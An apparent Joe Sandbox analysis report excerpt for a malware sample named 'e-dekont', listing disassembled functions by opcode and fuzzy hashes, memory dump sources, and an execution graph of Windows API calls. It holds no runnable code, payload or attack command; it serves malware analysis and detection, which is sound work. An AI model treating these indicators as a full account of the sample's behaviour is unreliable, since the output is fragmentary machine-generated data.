                                                        • Opcode Fuzzy Hash: 927f5d63ba18ffb353282af1d97dbdb70483210272aa5bce89460c6f683a25af
                                                        • Instruction Fuzzy Hash: 74E11BB4E012598FCB14DFA9C5849AEFBB6FF89304F24C169D415AB35AD730A942CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05060130 Relevance: .3, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cb16f009ea67c5e09f288e3104a389d8c5a214bd254ac892794b822e063edc7
                                                        • Instruction ID: cd0249ae6fdc9672f3c059b4e276dd3391c8c9b0eb82a9f58aac1913a5958de0
                                                        • Opcode Fuzzy Hash: 3cb16f009ea67c5e09f288e3104a389d8c5a214bd254ac892794b822e063edc7
                                                        • Instruction Fuzzy Hash: 4112A6B0C857458AE711CF65E84C1893BB1BB55318BF04A09E2613F2E5DFB8A5ABCF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07614D18 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2b6c6265ae4bdc84ea1adfef44402b8d05c17bb918c1b621b813372004595ab
                                                        • Instruction ID: a447bcf321dbcb79e9b785984fa88b260fd85846d5273c5054a2a92820f21e2d
                                                        • Opcode Fuzzy Hash: e2b6c6265ae4bdc84ea1adfef44402b8d05c17bb918c1b621b813372004595ab
                                                        • Instruction Fuzzy Hash: CBE11CB4E011598FCB14DFA9C5849AEFBB6FF89304F24C159D415AB356DB30A942CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076155F0 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e0756f838704bfb50dcd52152ddb2d0cf7f3ec611e0153e8cfc36718f592552
                                                        • Instruction ID: 69d47f343f2c71ed35385b975625be23fc59f35cf7d474343f4018e67b4a6975
                                                        • Opcode Fuzzy Hash: 4e0756f838704bfb50dcd52152ddb2d0cf7f3ec611e0153e8cfc36718f592552
                                                        • Instruction Fuzzy Hash: A2E118B4E011198FCB14DFA9C5849AEFBB6FF89304F24C169D416AB356D730A942CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07612CA8 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e05ddff7ecdb166ac0c96323b511ba93a6bc51072d2decd28b9a72809a9f383
                                                        • Instruction ID: b5f8bf92006c4456566686fce56e1fcb174f95c59158dc35a15ca4659c8ac4ba
                                                        • Opcode Fuzzy Hash: 1e05ddff7ecdb166ac0c96323b511ba93a6bc51072d2decd28b9a72809a9f383
                                                        • Instruction Fuzzy Hash: 43E118B4E001198FCB14DFA9C5949AEFBB6FF89304F24C169E415AB356D730A942CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076148E0 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 491fad7a0839a5eb83d0174754879604916435dc0cecc945759b4ce7cf9a36b5
                                                        • Instruction ID: 9bb910bef1d013c0d85cf9d2f86f4d5b03bc0239319707e40bca6843e3941e78
                                                        • Opcode Fuzzy Hash: 491fad7a0839a5eb83d0174754879604916435dc0cecc945759b4ce7cf9a36b5
                                                        • Instruction Fuzzy Hash: F4E12AB4E011598FCB14DFA9C5849AEFBB6FF89304F24C169D415AB31ADB30A942CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FA1F0 Relevance: .3, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a5e35c8f300dca699b6aae0782f4fe0beed1e3d8da7c5e39445acf4a3556aaf
                                                        • Instruction ID: b2acbc0a1cbefcddf71380fea003e25ea056ec2cc1c043149644bacbc86a05a6
                                                        • Opcode Fuzzy Hash: 5a5e35c8f300dca699b6aae0782f4fe0beed1e3d8da7c5e39445acf4a3556aaf
                                                        • Instruction Fuzzy Hash: 75D11531D2075ACACB00EB68D951ADDB771FF95300F50879AE0093B2A5FB706AC9CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295DA4C Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f927128ba1f34afab417f9c3711e72f041f9b89e3a1961420ec36b332491d31
                                                        • Instruction ID: 1beaabdcded839ab0728ff05e4208c0d52a23b97875dfd598e3db39365d99ea2
                                                        • Opcode Fuzzy Hash: 1f927128ba1f34afab417f9c3711e72f041f9b89e3a1961420ec36b332491d31
                                                        • Instruction Fuzzy Hash: 38A19D32F002298FCF05DFB4C8445AEB7B6FF85310B25456AE805AB264DB31E916CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FA200 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 123bb789a405f707f21733a29737031dff26e00b50a7c2cfa907b44f5df1a273
                                                        • Instruction ID: e8eeee47b9a0831a840dc9e82e01c5fa35bb87cd05b085fc35c538463a5538d8
                                                        • Opcode Fuzzy Hash: 123bb789a405f707f21733a29737031dff26e00b50a7c2cfa907b44f5df1a273
                                                        • Instruction Fuzzy Hash: 08D1F531D2075ACACB00EB68D951A9DB771FF95300F50879AE4093B265FB706AC9CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FA1C9 Relevance: .3, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6d72ec1026ebc3ca8c9abbafac80f5b8a923482ee202d2aefe9a8ade576b0990
                                                        • Instruction ID: 8f15d5139ea21fbae36eebf1c594fd430d87a9615ae9e4461c5cfe0d4d6345f2
                                                        • Opcode Fuzzy Hash: 6d72ec1026ebc3ca8c9abbafac80f5b8a923482ee202d2aefe9a8ade576b0990
                                                        • Instruction Fuzzy Hash: 12D10431D2075ACECB00EB68D951A9DB771FF95300F50C7AAE0097B265EB706AC9CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05060120 Relevance: .2, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1fa947cfeb2e41539b086d9cf08868082d619200068c08c50753af7ac2f903cd
                                                        • Instruction ID: e741f291753b3ba1e2ab7394493507f3800ab3ddf7fb74cbb6678cc6000c9284
                                                        • Opcode Fuzzy Hash: 1fa947cfeb2e41539b086d9cf08868082d619200068c08c50753af7ac2f903cd
                                                        • Instruction Fuzzy Hash: 2DC1F8B0C847468BD711CF65E8481897BB1BB95328BB14A09E1617F2E4DFB8A4A7CF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F59A0 Relevance: .2, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52ec7866a0cb53171f7b53d12babfe152971b7503e008497612e56b4188f80a7
                                                        • Instruction ID: e634783cb2855df211c14fa3e6b03b2c806096e3058257bb7e3052c596ceaca3
                                                        • Opcode Fuzzy Hash: 52ec7866a0cb53171f7b53d12babfe152971b7503e008497612e56b4188f80a7
                                                        • Instruction Fuzzy Hash: F081FFB4E14219CFCB44CFA9C58499EFBF2FF89250F14955AE519AB320D334AA52CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F5990 Relevance: .2, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f62afcce6857a13e7ba914d61d70f8c5a37d194c42bc93619d10291e7fa42b3
                                                        • Instruction ID: 0e08593f4f58c793971ae07025a1731b375d4a5094e66d7a763616bda2fd9bbb
                                                        • Opcode Fuzzy Hash: 8f62afcce6857a13e7ba914d61d70f8c5a37d194c42bc93619d10291e7fa42b3
                                                        • Instruction Fuzzy Hash: 9F8102B4E14219CFCB44CFA9C58499EBBF2FF89350F14945AD419AB320D334AA52CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F3650 Relevance: .2, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13a9785f52bdd943a211da632416edf9d1135d54b0d0efd7be1a2272f33947a0
                                                        • Instruction ID: 393bd77bd58af4e958f8c5af6dd8c9a013e7135f3097a1991d20fe0f75792f1d
                                                        • Opcode Fuzzy Hash: 13a9785f52bdd943a211da632416edf9d1135d54b0d0efd7be1a2272f33947a0
                                                        • Instruction Fuzzy Hash: 077156B4E1120ADFDB04CF99D4819EEFBB6FB89350F10812AE505AB354C3349A41CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F6848 Relevance: .2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb52833aa017b737bf5341b5e86868022375e821a8ad807633b4ebb4d6f841b6
                                                        • Instruction ID: 5c9b1903770ddac9706b1e28b71881e089a60dd56859a58ff2029b1de6a4aac3
                                                        • Opcode Fuzzy Hash: bb52833aa017b737bf5341b5e86868022375e821a8ad807633b4ebb4d6f841b6
                                                        • Instruction Fuzzy Hash: 026116B1E1520ADFDF04CFA9C5829EEFBB6BF89340F14805AD519A7204D7349A81CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F6E00 Relevance: .2, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c1f623d54b3e17d41550543ca6dd39f58f5e51874ec9f719933a7803444c924
                                                        • Instruction ID: 074793a2a6a6953714c115b2d413dbf85533eb7145c40c527a8ad7417c2b250d
                                                        • Opcode Fuzzy Hash: 2c1f623d54b3e17d41550543ca6dd39f58f5e51874ec9f719933a7803444c924
                                                        • Instruction Fuzzy Hash: B261E4B0915B05DBE708CFA1E687659BFB7FBCA340FE09495C08996194D73983B5C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F8ED0 Relevance: .1, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfa14046278cc3c81c654445f1789b81de1014984df1dd81d9d66a19ba04192f
                                                        • Instruction ID: ce2d7cc6ff281894af5ca4245b35bf1771b7a08cee3c5e06074cd99ec9650e1c
                                                        • Opcode Fuzzy Hash: bfa14046278cc3c81c654445f1789b81de1014984df1dd81d9d66a19ba04192f
                                                        • Instruction Fuzzy Hash: 235149B0E1630ACFDB08CFA6E5455EEBBB3EF89350F10942AE505E7254D7345A428F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F8EE0 Relevance: .1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 415658c4ee67e05d3f5755e906e1ba3da18980989c53971a5982846f8162f1d1
                                                        • Instruction ID: 3d998c5adca2879d8052a77b55fc59c30713371fd9208dc84d6768f59121f6c8
                                                        • Opcode Fuzzy Hash: 415658c4ee67e05d3f5755e906e1ba3da18980989c53971a5982846f8162f1d1
                                                        • Instruction Fuzzy Hash: CD5137B0E1620ADFDB08CFA6E4456EEBBF3AF89350F10942AE509E7254D7345A418F94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F6BC8 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 817e395d8509f8293b86f080fe654adde88cd2f76a82fd2b7e30dc5ab09e1df3
                                                        • Instruction ID: a09c0ea6fd9ab1c8519d758f7412f5b491f77f37233cccf9b71983e3c3a3043c
                                                        • Opcode Fuzzy Hash: 817e395d8509f8293b86f080fe654adde88cd2f76a82fd2b7e30dc5ab09e1df3
                                                        • Instruction Fuzzy Hash: 6241E4B0E1020ADBDB08CFAAC4815AEFBB6FF88340F14D52AD959E7210D7349A418F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:11.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:1.8%
                                                        Total number of Nodes:167
                                                        Total number of Limit Nodes:17
                                                        execution_graph 39536 6c24b68 39537 6c24b6d GetCurrentProcess 39536->39537 39539 6c24c00 GetCurrentThread 39537->39539 39540 6c24bf9 39537->39540 39541 6c24c36 39539->39541 39542 6c24c3d GetCurrentProcess 39539->39542 39540->39539 39541->39542 39543 6c24c73 39542->39543 39548 6c24d48 39543->39548 39551 6c24d38 39543->39551 39544 6c24c9b GetCurrentThreadId 39545 6c24ccc 39544->39545 39554 6c24834 39548->39554 39552 6c24834 DuplicateHandle 39551->39552 39553 6c24d76 39551->39553 39552->39553 39553->39544 39555 6c24db0 DuplicateHandle 39554->39555 39556 6c24d76 39555->39556 39556->39544 39557 2dcd3d0 39558 2dcd3dc 39557->39558 39565 6c08a48 39558->39565 39570 6c08a58 39558->39570 39559 2dcd5b6 39560 2dcd611 39559->39560 39575 6c23a50 39559->39575 39579 6c23a60 39559->39579 39566 6c08a58 39565->39566 39567 6c08b8c 39566->39567 39583 5b48d94 39566->39583 39587 5b489b0 39566->39587 39567->39559 39571 6c08a7a 39570->39571 39572 6c08b8c 39571->39572 39573 5b48d94 LdrInitializeThunk 39571->39573 39574 5b489b0 LdrInitializeThunk 39571->39574 39572->39559 39573->39572 39574->39572 39576 6c23a6f 39575->39576 39591 6c2312c 39576->39591 39580 6c23a6f 39579->39580 39581 6c2312c 6 API calls 39580->39581 39582 6c23a90 39581->39582 39582->39560 39585 5b48c4b 39583->39585 39584 5b48ed1 LdrInitializeThunk 39586 5b48ee9 39584->39586 39585->39584 39586->39567 39589 5b489e1 39587->39589 39588 5b48b41 39588->39567 39589->39588 39590 5b48ed1 LdrInitializeThunk 39589->39590 39590->39588 39592 6c23137 39591->39592 39595 6c24904 39592->39595 39594 6c25416 39594->39594 39596 6c2490f 39595->39596 39597 6c25b3c 39596->39597 39599 6c277c8 39596->39599 39597->39594 39600 6c277e9 39599->39600 39601 6c2780d 39600->39601 39604 6c27978 39600->39604 39608 6c27969 39600->39608 39601->39597 39605 6c27985 39604->39605 39606 6c279be 39605->39606 39612 6c25f7c 39605->39612 39606->39601 39609 6c27978 39608->39609 39610 6c25f7c 6 API calls 39609->39610 39611 6c279be 39609->39611 39610->39611 39611->39601 39613 6c25f87 39612->39613 39615 6c27a30 39613->39615 39616 6c25fb0 39613->39616 39615->39615 39617 6c25fbb 39616->39617 39623 6c25fc0 39617->39623 39619 6c27a9f 39627 6c2ce9f 39619->39627 39636 6c2cea0 39619->39636 39620 6c27ad9 39620->39615 39626 6c25fcb 39623->39626 39624 6c28dc0 39624->39619 39625 6c277c8 6 API calls 39625->39624 39626->39624 39626->39625 39629 6c2ced1 39627->39629 39630 6c2cfd1 39627->39630 39628 6c2cedd 39628->39620 39629->39628 39645 6c2d108 39629->39645 39650 6c2d118 39629->39650 39630->39620 39631 6c2cf1d 39654 6c2e813 39631->39654 39665 6c2e820 39631->39665 39638 6c2cfd1 39636->39638 39639 6c2ced1 39636->39639 39637 6c2cedd 39637->39620 39638->39620 39639->39637 39643 6c2d108 4 API calls 39639->39643 39644 6c2d118 4 API calls 39639->39644 39640 6c2cf1d 39641 6c2e813 3 API calls 39640->39641 39642 6c2e820 3 API calls 39640->39642 39641->39638 39642->39638 39643->39640 39644->39640 39646 6c2d118 39645->39646 39675 6c2d158 39646->39675 39685 6c2d168 39646->39685 39647 6c2d122 39647->39631 39652 6c2d158 3 API calls 39650->39652 39653 6c2d168 3 API calls 39650->39653 39651 6c2d122 39651->39631 39652->39651 39653->39651 39655 6c2e7e1 39654->39655 39656 6c2e81b 39654->39656 39655->39630 39695 6c2ed7b 39656->39695 39700 6c2ed80 39656->39700 39657 6c2e8ce 39658 6c2e8fa 39657->39658 39705 6c2c100 39657->39705 39658->39658 39666 6c2e84b 39665->39666 39671 6c2ed80 GetModuleHandleW 39666->39671 39672 6c2ed7b GetModuleHandleW 39666->39672 39667 6c2e8ce 39668 6c2c100 GetModuleHandleW 39667->39668 39670 6c2e8fa 39667->39670 39669 6c2e93e 39668->39669 39673 6c2f6d0 2 API calls 39669->39673 39674 6c2f700 CreateWindowExW 39669->39674 39671->39667 39672->39667 39673->39670 39674->39670 39676 6c2d179 39675->39676 39679 6c2d19c 39675->39679 39677 6c2c100 GetModuleHandleW 39676->39677 39678 6c2d184 39677->39678 39678->39679 39683 6c2d3f3 GetModuleHandleW LoadLibraryExW 39678->39683 39684 6c2d400 GetModuleHandleW LoadLibraryExW 39678->39684 39679->39647 39680 6c2d3a0 GetModuleHandleW 39682 6c2d3cd 39680->39682 39681 6c2d194 39681->39679 39681->39680 39682->39647 39683->39681 39684->39681 39686 6c2d179 39685->39686 39689 6c2d19c 39685->39689 39687 6c2c100 GetModuleHandleW 39686->39687 39688 6c2d184 39687->39688 39688->39689 39693 6c2d3f3 GetModuleHandleW LoadLibraryExW 39688->39693 39694 6c2d400 GetModuleHandleW LoadLibraryExW 39688->39694 39689->39647 39690 6c2d194 39690->39689 39691 6c2d3a0 GetModuleHandleW 39690->39691 39692 6c2d3cd 39691->39692 39692->39647 39693->39690 39694->39690 39697 6c2edad 39695->39697 39696 6c2ee2e 39696->39657 39697->39696 39698 6c2eef0 GetModuleHandleW 39697->39698 39699 6c2eeeb GetModuleHandleW 39697->39699 39698->39696 39699->39696 39701 6c2edad 39700->39701 39702 6c2ee2e 39701->39702 39703 6c2eef0 GetModuleHandleW 39701->39703 39704 6c2eeeb GetModuleHandleW 39701->39704 39702->39657 39703->39702 39704->39702 39706 6c2d358 GetModuleHandleW 39705->39706 39708 6c2d3cd 39706->39708 39709 6c2f6d0 39708->39709 39718 6c2f700 39708->39718 39710 6c2f623 39709->39710 39711 6c2f6d3 39709->39711 39710->39658 39711->39710 39712 6c2f715 39711->39712 39715 6c2f74b CreateWindowExW 39711->39715 39713 6c2d84c CreateWindowExW 39712->39713 39714 6c2f735 39713->39714 39714->39658 39717 6c2f874 39715->39717 39717->39717 39719 6c2f735 39718->39719 39720 6c2d84c CreateWindowExW 39718->39720 39719->39658 39720->39719 39721 5b4bd0b 39722 5b4bbcf 39721->39722 39723 5b4bcb3 39722->39723 39728 5b4bfc4 39722->39728 39733 5b4be18 39722->39733 39737 5b4be28 39722->39737 39741 5b4bf64 39722->39741 39729 5b4bf43 39728->39729 39730 5b4bfc9 39728->39730 39731 5b4be79 LdrInitializeThunk 39729->39731 39732 5b4be86 39729->39732 39730->39723 39731->39732 39732->39723 39734 5b4be28 LdrInitializeThunk 39733->39734 39736 5b4be86 39734->39736 39736->39723 39738 5b4be50 LdrInitializeThunk 39737->39738 39740 5b4be86 39738->39740 39740->39723 39742 5b4bf43 39741->39742 39743 5b4be79 LdrInitializeThunk 39742->39743 39744 5b4be86 39742->39744 39743->39744 39744->39723

                                                        Executed Functions

                                                        Function 02DCB388 Relevance: 6.6, Strings: 5, Instructions: 351COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 672 2dcb388-2dcb39b 673 2dcb4da-2dcb4e1 672->673 674 2dcb3a1-2dcb3aa 672->674 675 2dcb4e4 674->675 676 2dcb3b0-2dcb3b4 674->676 681 2dcb4e9-2dcb4f1 675->681 677 2dcb3ce-2dcb3d5 676->677 678 2dcb3b6 676->678 677->673 680 2dcb3db-2dcb3e8 677->680 679 2dcb3b9-2dcb3c4 678->679 679->675 682 2dcb3ca-2dcb3cc 679->682 680->673 687 2dcb3ee-2dcb401 680->687 685 2dcb4d9 681->685 686 2dcb4f3-2dcb510 681->686 682->677 682->679 685->673 688 2dcb53c 686->688 689 2dcb512-2dcb52a 686->689 690 2dcb406-2dcb40e 687->690 691 2dcb403 687->691 692 2dcb53e-2dcb540 688->692 704 2dcb52c-2dcb531 689->704 705 2dcb533-2dcb536 689->705 693 2dcb47b-2dcb47d 690->693 694 2dcb410-2dcb416 690->694 691->690 696 2dcb541-2dcb542 692->696 693->673 697 2dcb47f-2dcb485 693->697 694->693 698 2dcb418-2dcb41e 694->698 697->673 699 2dcb487-2dcb491 697->699 698->681 700 2dcb424-2dcb43c 698->700 699->681 702 2dcb493-2dcb4ab 699->702 711 2dcb43e-2dcb444 700->711 712 2dcb469-2dcb46c 700->712 715 2dcb4ad-2dcb4b3 702->715 716 2dcb4d0-2dcb4d3 702->716 704->692 707 2dcb538-2dcb53a 705->707 708 2dcb543-2dcb559 705->708 707->688 707->689 708->696 714 2dcb55b-2dcb580 708->714 711->681 717 2dcb44a-2dcb45e 711->717 712->675 718 2dcb46e-2dcb471 712->718 719 2dcb587-2dcb664 call 2dc3960 call 2dc3480 714->719 720 2dcb582 714->720 715->681 721 2dcb4b5-2dcb4c9 715->721 716->675 722 2dcb4d5-2dcb4d8 716->722 717->681 727 2dcb464 717->727 718->675 723 2dcb473-2dcb479 718->723 737 2dcb66b-2dcb68c call 2dc4e20 719->737 738 2dcb666 719->738 720->719 721->681 728 2dcb4cb 721->728 722->685 722->699 723->693 723->694 727->712 728->716 740 2dcb691-2dcb69c 737->740 738->737 741 2dcb69e 740->741 742 2dcb6a3-2dcb6a7 740->742 741->742 743 2dcb6ac-2dcb6b3 742->743 744 2dcb6a9-2dcb6aa 742->744 746 2dcb6ba-2dcb6c8 743->746 747 2dcb6b5 743->747 745 2dcb6cb-2dcb70f 744->745 751 2dcb775-2dcb78c 745->751 746->745 747->746 753 2dcb78e-2dcb7b3 751->753 754 2dcb711-2dcb727 751->754 760 2dcb7cb 753->760 761 2dcb7b5-2dcb7ca 753->761 758 2dcb729-2dcb735 754->758 759 2dcb751 754->759 762 2dcb73f-2dcb745 758->762 763 2dcb737-2dcb73d 758->763 764 2dcb757-2dcb774 759->764 766 2dcb7cc 760->766 761->760 765 2dcb74f 762->765 763->765 764->751 765->764 766->766
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                        • API String ID: 0-1487592376
                                                        • Opcode ID: 36a196c00c9e53fbc9c3818547de47ea4be590221620d00796d31bc10b45fc61
                                                        • Instruction ID: c7f692ba1a5eb0cb1ad94a91729d8686e901062d27e18f8e14b622470e0ae161
                                                        • Opcode Fuzzy Hash: 36a196c00c9e53fbc9c3818547de47ea4be590221620d00796d31bc10b45fc61
                                                        • Instruction Fuzzy Hash: AEE1E874A04659CFDB14CFA9C985A9DBBB1FF48308F25806AE819AB361DB30EC41CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCC7B1 Relevance: 6.4, Strings: 5, Instructions: 193COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
